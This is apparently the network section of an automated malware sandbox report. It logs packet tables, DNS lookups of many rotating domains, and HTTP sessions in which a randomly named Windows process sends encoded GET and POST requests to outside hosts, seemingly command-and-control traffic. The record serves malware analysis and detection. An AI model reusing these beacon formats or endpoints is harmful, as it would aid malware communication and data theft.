Aug 12, 2024 05:16:09.142751932 CEST	49768	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:09.147726059 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:09.777957916 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:09.779057026 CEST	80	49768	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:09.779222965 CEST	49768	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:10.655678034 CEST	49768	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:11.674904108 CEST	49769	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:11.680104971 CEST	80	49769	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:11.682969093 CEST	49769	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:11.686892986 CEST	49769	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:11.691833019 CEST	80	49769	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:12.319983959 CEST	80	49769	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:12.320008039 CEST	80	49769	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:12.321100950 CEST	49769	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:13.186968088 CEST	49769	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:14.210916996 CEST	49770	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:14.216140032 CEST	80	49770	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:14.217000008 CEST	49770	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:14.222965002 CEST	49770	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:14.228236914 CEST	80	49770	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:14.228256941 CEST	80	49770	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:14.228269100 CEST	80	49770	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:14.228281021 CEST	80	49770	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:14.228296995 CEST	80	49770	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:14.228308916 CEST	80	49770	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:14.228315115 CEST	80	49770	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:14.228327036 CEST	80	49770	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:14.228332996 CEST	80	49770	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:14.881951094 CEST	80	49770	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:14.936863899 CEST	49770	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:14.978902102 CEST	80	49770	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:14.978972912 CEST	49770	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:15.734904051 CEST	49770	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:16.753211975 CEST	49771	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:16.758177996 CEST	80	49771	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:16.758250952 CEST	49771	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:16.760590076 CEST	49771	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:16.765469074 CEST	80	49771	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:17.398683071 CEST	80	49771	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:17.398710966 CEST	80	49771	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:17.398799896 CEST	49771	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:17.401323080 CEST	49771	80	192.168.2.4	91.195.240.19
Aug 12, 2024 05:16:17.406599998 CEST	80	49771	91.195.240.19	192.168.2.4
Aug 12, 2024 05:16:22.513921976 CEST	49772	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:22.519074917 CEST	80	49772	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:22.522958994 CEST	49772	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:22.525908947 CEST	49772	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:22.530846119 CEST	80	49772	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:23.205086946 CEST	80	49772	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:23.205149889 CEST	80	49772	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:23.205185890 CEST	80	49772	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:23.205204010 CEST	49772	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:23.205220938 CEST	80	49772	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:23.205250025 CEST	80	49772	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:23.205275059 CEST	49772	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:23.205300093 CEST	49772	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:24.030786991 CEST	49772	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:25.049818039 CEST	49773	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:25.055792093 CEST	80	49773	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:25.055872917 CEST	49773	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:25.058386087 CEST	49773	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:25.063457966 CEST	80	49773	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:25.748203039 CEST	80	49773	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:25.748261929 CEST	80	49773	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:25.748301029 CEST	80	49773	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:25.748332977 CEST	80	49773	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:25.748332977 CEST	49773	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:25.748363972 CEST	80	49773	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:25.748404026 CEST	49773	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:25.748555899 CEST	49773	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:26.561970949 CEST	49773	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:27.582910061 CEST	49774	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:27.588087082 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:27.591008902 CEST	49774	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:27.594923019 CEST	49774	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:27.600162029 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:27.600203037 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:27.600229979 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:27.600256920 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:27.600316048 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:27.600373983 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:27.600400925 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:27.600426912 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:27.600454092 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:28.296330929 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:28.296379089 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:28.296422005 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:28.296458960 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:28.296860933 CEST	49774	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:28.296983004 CEST	49774	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:28.417829037 CEST	80	49774	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:28.418961048 CEST	49774	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:29.108928919 CEST	49774	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:30.127448082 CEST	49775	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:30.132524014 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:30.134991884 CEST	49775	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:30.138892889 CEST	49775	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:30.143963099 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:30.835688114 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:30.835733891 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:30.835767031 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:30.835798025 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:30.835819960 CEST	49775	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:30.835832119 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:30.835856915 CEST	49775	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:30.835865021 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:30.835899115 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:30.835916996 CEST	49775	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:30.835930109 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:30.835964918 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:30.835972071 CEST	49775	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:30.836050034 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:30.836095095 CEST	49775	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:30.840945959 CEST	49775	80	192.168.2.4	194.58.112.174
Aug 12, 2024 05:16:30.845834970 CEST	80	49775	194.58.112.174	192.168.2.4
Aug 12, 2024 05:16:35.866898060 CEST	49776	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:35.872076035 CEST	80	49776	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:35.874982119 CEST	49776	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:35.878890038 CEST	49776	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:35.884095907 CEST	80	49776	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:37.390177965 CEST	49776	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:37.396478891 CEST	80	49776	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:37.396585941 CEST	49776	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:38.410020113 CEST	49777	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:38.415412903 CEST	80	49777	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:38.419038057 CEST	49777	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:38.421303988 CEST	49777	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:38.426805973 CEST	80	49777	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:39.937119961 CEST	49777	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:39.948152065 CEST	80	49777	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:39.948304892 CEST	49777	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:40.957024097 CEST	49778	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:40.962505102 CEST	80	49778	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:40.962657928 CEST	49778	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:40.965296984 CEST	49778	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:40.970933914 CEST	80	49778	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:40.970972061 CEST	80	49778	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:40.970999956 CEST	80	49778	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:40.971025944 CEST	80	49778	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:40.971051931 CEST	80	49778	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:40.971079111 CEST	80	49778	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:40.971105099 CEST	80	49778	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:40.971132040 CEST	80	49778	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:40.971234083 CEST	80	49778	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:42.469573021 CEST	49778	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:42.475348949 CEST	80	49778	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:42.479104996 CEST	49778	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:43.487526894 CEST	49779	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:43.507030010 CEST	80	49779	104.21.45.56	192.168.2.4
Aug 12, 2024 05:16:43.507114887 CEST	49779	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:43.509048939 CEST	49779	80	192.168.2.4	104.21.45.56
Aug 12, 2024 05:16:43.514334917 CEST	80	49779	104.21.45.56	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 12, 2024 05:13:30.278496981 CEST	59072	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:13:30.316458941 CEST	53	59072	1.1.1.1	192.168.2.4
Aug 12, 2024 05:13:46.050177097 CEST	51284	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:13:46.315876961 CEST	53	51284	1.1.1.1	192.168.2.4
Aug 12, 2024 05:13:59.627396107 CEST	61925	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:13:59.636177063 CEST	53	61925	1.1.1.1	192.168.2.4
Aug 12, 2024 05:14:07.696597099 CEST	60821	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:14:07.716068029 CEST	53	60821	1.1.1.1	192.168.2.4
Aug 12, 2024 05:14:15.788949966 CEST	56089	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:14:16.202466011 CEST	53	56089	1.1.1.1	192.168.2.4
Aug 12, 2024 05:14:30.301140070 CEST	55874	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:14:31.312119961 CEST	55874	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:14:31.357090950 CEST	53	55874	1.1.1.1	192.168.2.4
Aug 12, 2024 05:14:31.357131958 CEST	53	55874	1.1.1.1	192.168.2.4
Aug 12, 2024 05:14:39.427066088 CEST	62135	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:14:40.226320028 CEST	53	62135	1.1.1.1	192.168.2.4
Aug 12, 2024 05:14:53.721364975 CEST	59038	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:14:53.801259995 CEST	53	59038	1.1.1.1	192.168.2.4
Aug 12, 2024 05:15:07.097258091 CEST	64049	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:15:07.675668955 CEST	53	64049	1.1.1.1	192.168.2.4
Aug 12, 2024 05:15:41.658531904 CEST	50851	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:15:41.683772087 CEST	53	50851	1.1.1.1	192.168.2.4
Aug 12, 2024 05:15:55.004010916 CEST	56651	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:15:55.407530069 CEST	53	56651	1.1.1.1	192.168.2.4
Aug 12, 2024 05:16:09.096802950 CEST	63066	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:16:09.133132935 CEST	53	63066	1.1.1.1	192.168.2.4
Aug 12, 2024 05:16:22.414927006 CEST	53217	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:16:22.505395889 CEST	53	53217	1.1.1.1	192.168.2.4
Aug 12, 2024 05:16:35.847002029 CEST	49199	53	192.168.2.4	1.1.1.1
Aug 12, 2024 05:16:35.859514952 CEST	53	49199	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 12, 2024 05:13:30.278496981 CEST	192.168.2.4	1.1.1.1	0xa177	Standard query (0)	www.hprlz.cz	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:13:46.050177097 CEST	192.168.2.4	1.1.1.1	0xc19e	Standard query (0)	www.catherineviskadi.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:13:59.627396107 CEST	192.168.2.4	1.1.1.1	0x7583	Standard query (0)	www.hatercoin.online	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:07.696597099 CEST	192.168.2.4	1.1.1.1	0xd57c	Standard query (0)	www.fourgrouw.cfd	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:15.788949966 CEST	192.168.2.4	1.1.1.1	0x2e68	Standard query (0)	www.bfiworkerscomp.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:30.301140070 CEST	192.168.2.4	1.1.1.1	0x5cdc	Standard query (0)	www.tinmapco.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:31.312119961 CEST	192.168.2.4	1.1.1.1	0x5cdc	Standard query (0)	www.tinmapco.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:39.427066088 CEST	192.168.2.4	1.1.1.1	0x6933	Standard query (0)	www.xn--fhq1c541j0zr.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:53.721364975 CEST	192.168.2.4	1.1.1.1	0x56ab	Standard query (0)	www.xn--matfrmn-jxa4m.se	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:15:07.097258091 CEST	192.168.2.4	1.1.1.1	0x39df	Standard query (0)	www.anuts.top	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:15:41.658531904 CEST	192.168.2.4	1.1.1.1	0x5baa	Standard query (0)	www.telwisey.info	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:15:55.004010916 CEST	192.168.2.4	1.1.1.1	0xc591	Standard query (0)	www.sandranoll.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:16:09.096802950 CEST	192.168.2.4	1.1.1.1	0xb73b	Standard query (0)	www.gipsytroya.com	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:16:22.414927006 CEST	192.168.2.4	1.1.1.1	0xc861	Standard query (0)	www.helpers-lion.online	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:16:35.847002029 CEST	192.168.2.4	1.1.1.1	0x948f	Standard query (0)	www.dmtxwuatbz.cc	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 12, 2024 05:13:30.316458941 CEST	1.1.1.1	192.168.2.4	0xa177	No error (0)	www.hprlz.cz		5.44.111.162	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:13:46.315876961 CEST	1.1.1.1	192.168.2.4	0xc19e	No error (0)	www.catherineviskadi.com		217.160.0.106	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:13:59.636177063 CEST	1.1.1.1	192.168.2.4	0x7583	Name error (3)	www.hatercoin.online	none	none	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:07.716068029 CEST	1.1.1.1	192.168.2.4	0xd57c	Name error (3)	www.fourgrouw.cfd	none	none	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:16.202466011 CEST	1.1.1.1	192.168.2.4	0x2e68	No error (0)	www.bfiworkerscomp.com		208.91.197.27	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:31.357090950 CEST	1.1.1.1	192.168.2.4	0x5cdc	Name error (3)	www.tinmapco.com	none	none	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:31.357131958 CEST	1.1.1.1	192.168.2.4	0x5cdc	Name error (3)	www.tinmapco.com	none	none	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:40.226320028 CEST	1.1.1.1	192.168.2.4	0x6933	No error (0)	www.xn--fhq1c541j0zr.com		43.252.167.188	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:53.801259995 CEST	1.1.1.1	192.168.2.4	0x56ab	No error (0)	www.xn--matfrmn-jxa4m.se		194.9.94.85	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:14:53.801259995 CEST	1.1.1.1	192.168.2.4	0x56ab	No error (0)	www.xn--matfrmn-jxa4m.se		194.9.94.86	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:15:07.675668955 CEST	1.1.1.1	192.168.2.4	0x39df	No error (0)	www.anuts.top		23.251.54.212	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:15:41.683772087 CEST	1.1.1.1	192.168.2.4	0x5baa	No error (0)	www.telwisey.info		199.192.19.19	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:15:55.407530069 CEST	1.1.1.1	192.168.2.4	0xc591	No error (0)	www.sandranoll.com		213.145.228.16	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:16:09.133132935 CEST	1.1.1.1	192.168.2.4	0xb73b	No error (0)	www.gipsytroya.com	parkingpage.namecheap.com		CNAME (Canonical name)	IN (0x0001)	false
Aug 12, 2024 05:16:09.133132935 CEST	1.1.1.1	192.168.2.4	0xb73b	No error (0)	parkingpage.namecheap.com		91.195.240.19	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:16:22.505395889 CEST	1.1.1.1	192.168.2.4	0xc861	No error (0)	www.helpers-lion.online		194.58.112.174	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:16:35.859514952 CEST	1.1.1.1	192.168.2.4	0x948f	No error (0)	www.dmtxwuatbz.cc		104.21.45.56	A (IP address)	IN (0x0001)	false
Aug 12, 2024 05:16:35.859514952 CEST	1.1.1.1	192.168.2.4	0x948f	No error (0)	www.dmtxwuatbz.cc		172.67.210.102	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.hprlz.cz

www.catherineviskadi.com

www.bfiworkerscomp.com

www.xn--fhq1c541j0zr.com

www.xn--matfrmn-jxa4m.se

www.anuts.top

www.telwisey.info

www.sandranoll.com

www.gipsytroya.com

www.helpers-lion.online

www.dmtxwuatbz.cc

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49738	5.44.111.162	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:13:30.329245090 CEST	496	OUT	GET /w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.hprlz.cz Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 12, 2024 05:13:30.987478018 CEST	725	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Mon, 12 Aug 2024 03:13:30 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 377 Connection: close Location: https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo= Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 68 70 72 6c 7a 2e 63 7a 2f 77 36 71 67 2f 3f 5a 48 33 3d 79 66 31 48 33 76 36 68 26 61 6d 70 3b 59 58 44 54 3d 30 6c 70 54 52 51 63 44 55 48 2b 69 45 73 47 79 62 37 4b 39 33 6a 4a 33 41 6b 63 68 42 63 32 65 37 5a 2f 78 75 4e 6d 54 67 64 6c 69 39 72 70 4f 55 47 79 58 69 7a 6a 35 63 51 39 58 78 43 34 73 6f 38 34 46 4e 70 46 52 39 74 78 58 78 6d 30 74 71 31 43 61 79 68 4a 2b 4e 49 6b 43 44 4c 39 2f 38 50 35 33 71 36 7a 42 4e 4b 44 48 74 6a 53 75 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.hprlz.cz/w6qg/?ZH3=yf1H3v6h&YXDT=0lpTRQcDUH+iEsGyb7K93jJ3AkchBc2e7Z/xuNmTgdli9rpOUGyXizj5cQ9XxC4so84FNpFR9txXxm0tq1CayhJ+NIkCDL9/8P53q6zBNKDHtjSuHiPb7bo=">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49739	217.160.0.106	80	2008	C:\Program Files (x86)\FWjpHazgSHDJfXlkXeVVduUgrOZolegcTJCGLZVFiLXjAzIzvaxQbylznatNaSUjPcXNdzrYNUNBA\QAjjirwAoAEExvw.exe

Timestamp	Bytes transferred	Direction	Data
Aug 12, 2024 05:13:46.325484991 CEST	792	OUT	POST /qe66/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.catherineviskadi.com Origin: http://www.catherineviskadi.com Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 201 Referer: http://www.catherineviskadi.com/qe66/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 59 58 44 54 3d 51 6c 48 72 66 70 53 50 44 67 78 66 5a 61 63 2b 51 6c 4e 41 73 53 42 46 62 6e 77 79 33 61 2b 72 64 6c 56 6d 4d 4e 6b 2b 49 4c 37 5a 59 72 47 4d 46 70 61 4c 66 35 6f 76 69 35 4c 39 78 6f 56 57 4f 43 42 46 78 67 58 30 61 6d 6f 4f 34 53 4c 4e 42 54 7a 6f 6f 67 61 42 6a 62 71 48 52 2b 64 78 37 67 4a 62 61 31 71 68 6a 75 57 6d 54 6f 68 6f 6b 54 4f 4e 33 6a 7a 34 4d 74 44 52 37 4b 31 73 77 67 44 6b 79 37 66 4c 71 67 65 56 52 48 69 38 6a 47 37 78 31 79 48 35 32 6f 75 51 55 4c 6e 52 37 55 78 6c 46 66 58 56 4f 54 51 50 44 66 58 7a 61 2b 36 4f 5a 53 54 41 44 36 6b 79 56 41 65 71 65 51 3d 3d Data Ascii: YXDT=QlHrfpSPDgxfZac+QlNAsSBFbnwy3a+rdlVmMNk+IL7ZYrGMFpaLf5ovi5L9xoVWOCBFxgX0amoO4SLNBTzoogaBjbqHR+dx7gJba1qhjuWmTohokTON3jz4MtDR7K1swgDky7fLqgeVRHi8jG7x1yH52ouQULnR7UxlFfXVOTQPDfXza+6OZSTAD6kyVAeqeQ==
Aug 12, 2024 05:13:46.967302084 CEST	580	IN	HTTP/1.1 404 Not Found Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 12 Aug 2024 03:13:46 GMT Server: Apache Content-Encoding: gzip Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 